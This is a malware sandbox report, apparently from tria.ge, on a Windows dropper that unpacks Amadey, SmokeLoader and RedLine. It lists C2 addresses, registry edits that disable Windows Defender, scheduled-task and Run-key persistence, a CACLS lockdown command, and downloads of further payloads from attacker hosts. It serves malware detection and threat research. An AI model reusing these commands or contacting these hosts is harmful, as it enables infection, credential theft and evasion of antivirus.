Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
22/07/2023, 07:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
Resource
win10v2004-20230703-en
General
-
Target
44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
-
Size
514KB
-
MD5
359185cd139e6394a2c2dadee1076043
-
SHA1
f7b24aff5b24c399611f10ab59708f81f4fe95ea
-
SHA256
44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa
-
SHA512
6438e2ba152a2f45e292207480e71c0ed53b8ffe82e5ca4d3a2d2a914358c37f826692d8134fc899135019ec47cc7d57e84650b33d1a86a9c5e612b864027d05
-
SSDEEP
12288:dMr7y90QVj5N59ZZxOQgRWiEBhXAcB3HvPvME8NFXMq:+yp1fSQgRWim5N8N6q
Malware Config
Extracted
amadey
3.85
77.91.68.3/home/love/index.php
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grom
77.91.68.68:19071
-
auth_value
9ec3129bff410b89097d656d7abc33dc
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/files/0x00080000000231fc-152.dat healer behavioral1/files/0x00080000000231fc-153.dat healer behavioral1/memory/1824-154-0x00000000008F0000-0x00000000008FA000-memory.dmp healer -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a5274918.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a5274918.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a5274918.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a5274918.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a5274918.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a5274918.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation b1952586.exe Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation danke.exe Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation 18DD.exe -
Executes dropped EXE 10 IoCs
pid Process 3348 v9546199.exe 5088 v8993418.exe 1824 a5274918.exe 3784 b1952586.exe 2812 danke.exe 4152 c9824249.exe 60 d8279993.exe 2468 danke.exe 1836 18DD.exe 2956 danke.exe -
Loads dropped DLL 4 IoCs
pid Process 3416 rundll32.exe 3792 rundll32.exe 5088 rundll32.exe 5088 rundll32.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a5274918.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v9546199.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" v9546199.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v8993418.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v8993418.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c9824249.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c9824249.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c9824249.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 880 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings 18DD.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1824 a5274918.exe 1824 a5274918.exe 4152 c9824249.exe 4152 c9824249.exe 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found 3136 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3136 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4152 c9824249.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1824 a5274918.exe Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found Token: SeShutdownPrivilege 3136 Process not Found Token: SeCreatePagefilePrivilege 3136 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3784 b1952586.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1096 wrote to memory of 3348 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 85 PID 1096 wrote to memory of 3348 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 85 PID 1096 wrote to memory of 3348 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 85 PID 3348 wrote to memory of 5088 3348 v9546199.exe 86 PID 3348 wrote to memory of 5088 3348 v9546199.exe 86 PID 3348 wrote to memory of 5088 3348 v9546199.exe 86 PID 5088 wrote to memory of 1824 5088 v8993418.exe 87 PID 5088 wrote to memory of 1824 5088 v8993418.exe 87 PID 5088 wrote to memory of 3784 5088 v8993418.exe 96 PID 5088 wrote to memory of 3784 5088 v8993418.exe 96 PID 5088 wrote to memory of 3784 5088 v8993418.exe 96 PID 3784 wrote to memory of 2812 3784 b1952586.exe 97 PID 3784 wrote to memory of 2812 3784 b1952586.exe 97 PID 3784 wrote to memory of 2812 3784 b1952586.exe 97 PID 3348 wrote to memory of 4152 3348 v9546199.exe 98 PID 3348 wrote to memory of 4152 3348 v9546199.exe 98 PID 3348 wrote to memory of 4152 3348 v9546199.exe 98 PID 2812 wrote to memory of 880 2812 danke.exe 99 PID 2812 wrote to memory of 880 2812 danke.exe 99 PID 2812 wrote to memory of 880 2812 danke.exe 99 PID 2812 wrote to memory of 4952 2812 danke.exe 101 PID 2812 wrote to memory of 4952 2812 danke.exe 101 PID 2812 wrote to memory of 4952 2812 danke.exe 101 PID 4952 wrote to memory of 2184 4952 cmd.exe 103 PID 4952 wrote to memory of 2184 4952 cmd.exe 103 PID 4952 wrote to memory of 2184 4952 cmd.exe 103 PID 4952 wrote to memory of 756 4952 cmd.exe 104 PID 4952 wrote to memory of 756 4952 cmd.exe 104 PID 4952 wrote to memory of 756 4952 cmd.exe 104 PID 4952 wrote to memory of 2160 4952 cmd.exe 105 PID 4952 wrote to memory of 2160 4952 cmd.exe 105 PID 4952 wrote to memory of 2160 4952 cmd.exe 105 PID 4952 wrote to memory of 1848 4952 cmd.exe 106 PID 4952 wrote to memory of 1848 4952 cmd.exe 106 PID 4952 wrote to memory of 1848 4952 cmd.exe 106 PID 4952 wrote to memory of 2880 4952 cmd.exe 107 PID 4952 wrote to memory of 2880 4952 cmd.exe 107 PID 4952 wrote to memory of 2880 4952 cmd.exe 107 PID 4952 wrote to memory of 3412 4952 cmd.exe 108 PID 4952 wrote to memory of 3412 4952 cmd.exe 108 PID 4952 wrote to memory of 3412 4952 cmd.exe 108 PID 1096 wrote to memory of 60 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 109 PID 1096 wrote to memory of 60 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 109 PID 1096 wrote to memory of 60 1096 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe 109 PID 2812 wrote to memory of 3416 2812 danke.exe 117 PID 2812 wrote to memory of 3416 2812 danke.exe 117 PID 2812 wrote to memory of 3416 2812 danke.exe 117 PID 3136 wrote to memory of 1836 3136 Process not Found 119 PID 3136 wrote to memory of 1836 3136 Process not Found 119 PID 3136 wrote to memory of 1836 3136 Process not Found 119 PID 1836 wrote to memory of 4180 1836 18DD.exe 120 PID 1836 wrote to memory of 4180 1836 18DD.exe 120 PID 1836 wrote to memory of 4180 1836 18DD.exe 120 PID 4180 wrote to memory of 3792 4180 control.exe 122 PID 4180 wrote to memory of 3792 4180 control.exe 122 PID 4180 wrote to memory of 3792 4180 control.exe 122 PID 3792 wrote to memory of 2776 3792 rundll32.exe 123 PID 3792 wrote to memory of 2776 3792 rundll32.exe 123 PID 2776 wrote to memory of 5088 2776 RunDll32.exe 124 PID 2776 wrote to memory of 5088 2776 RunDll32.exe 124 PID 2776 wrote to memory of 5088 2776 RunDll32.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe"C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F6⤵
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2184
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:N"7⤵PID:756
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:R" /E7⤵PID:2160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:1848
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:N"7⤵PID:2880
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:R" /E7⤵PID:3412
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:3416
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4152
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe2⤵
- Executes dropped EXE
PID:60
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:2468
-
C:\Users\Admin\AppData\Local\Temp\18DD.exeC:\Users\Admin\AppData\Local\Temp\18DD.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",2⤵
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",5⤵
- Loads dropped DLL
PID:5088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:2956
Network
-
Remote address:8.8.8.8:53Request146.78.124.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request8.3.197.209.in-addr.arpaIN PTRResponse8.3.197.209.in-addr.arpaIN PTRvip0x008map2sslhwcdnnet
-
Remote address:8.8.8.8:53Request23.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request208.240.110.104.in-addr.arpaIN PTRResponse208.240.110.104.in-addr.arpaIN PTRa104-110-240-208deploystaticakamaitechnologiescom
-
Remote address:77.91.68.3:80RequestPOST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fpeumd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pmfwrats.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 192
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sneqxkmhcg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 248
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nihtya.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://grdguk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 197
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://opilmtwth.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.30:80RequestGET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 22 Jul 2023 06:50:34 GMT
ETag: "184e8e-6010dcc4c0280"
Accept-Ranges: bytes
Content-Length: 1592974
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request27.178.89.13.in-addr.arpaIN PTRResponse
-
515 B 365 B 6 5
HTTP Request
POST http://77.91.68.3/home/love/index.phpHTTP Response
200 -
260 B 5
-
1.4kB 842 B 9 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
260 B 5
-
834 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
3.9kB 94.8kB 76 74
HTTP Request
GET http://77.91.68.3/home/love/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.3/home/love/Plugins/clip64.dllHTTP Response
200 -
260 B 5
-
820 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
1.5kB 1.2kB 10 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
56.4kB 1.6MB 1090 1176
HTTP Request
GET http://77.91.68.30/fuzz/raman.exeHTTP Response
200 -
260 B 5
-
260 B 5
-
72 B 158 B 1 1
DNS Request
146.78.124.51.in-addr.arpa
-
70 B 111 B 1 1
DNS Request
8.3.197.209.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
74 B 141 B 1 1
DNS Request
208.240.110.104.in-addr.arpa
-
207 B 207 B 3 3
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
27.178.89.13.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD576fd6676743cf24b0f2011f4ca153f51
SHA1d90dbad79132048524d3c6f4fafdc1dff1128070
SHA256ae6b43b8b3a5c1e1f03671fb09015a59e3224dcf3f8b7aa84183407d4f111b92
SHA5123d091278b1e359ebc8406b6422527768705a54ea7b7b0c1aacd31c9ecdcb24ba3bf0269e55dc72a666cce7ac5cc3ca4165d13c783f9bf871d223fccfa4025de5
-
Filesize
1.5MB
MD576fd6676743cf24b0f2011f4ca153f51
SHA1d90dbad79132048524d3c6f4fafdc1dff1128070
SHA256ae6b43b8b3a5c1e1f03671fb09015a59e3224dcf3f8b7aa84183407d4f111b92
SHA5123d091278b1e359ebc8406b6422527768705a54ea7b7b0c1aacd31c9ecdcb24ba3bf0269e55dc72a666cce7ac5cc3ca4165d13c783f9bf871d223fccfa4025de5
-
Filesize
228KB
MD5be4091357bb914de71e288c65678a19c
SHA1349f9335ac78528e05450ad5d83d890c98b2588e
SHA256d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
SHA512106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444
-
Filesize
228KB
MD5be4091357bb914de71e288c65678a19c
SHA1349f9335ac78528e05450ad5d83d890c98b2588e
SHA256d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
SHA512106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444
-
Filesize
228KB
MD5be4091357bb914de71e288c65678a19c
SHA1349f9335ac78528e05450ad5d83d890c98b2588e
SHA256d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
SHA512106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444
-
Filesize
228KB
MD5be4091357bb914de71e288c65678a19c
SHA1349f9335ac78528e05450ad5d83d890c98b2588e
SHA256d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
SHA512106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444
-
Filesize
228KB
MD5be4091357bb914de71e288c65678a19c
SHA1349f9335ac78528e05450ad5d83d890c98b2588e
SHA256d285b471e3bcc650593b71d34e1c2c926db5ad0c48fd8314424b8954735f8422
SHA512106b63782314049b8ccb9db1dc5d76ebf5cea21c55432b94cd8a836414916d391590f524ae59d8541656024a03d5e540025288496c89856f113f5a739f125444
-
Filesize
1.3MB
MD59f0cd2d6ab20bfe5e37bcf5e3f7d156e
SHA113dafab2c1f38b8e7ddeef055436f42ef175d384
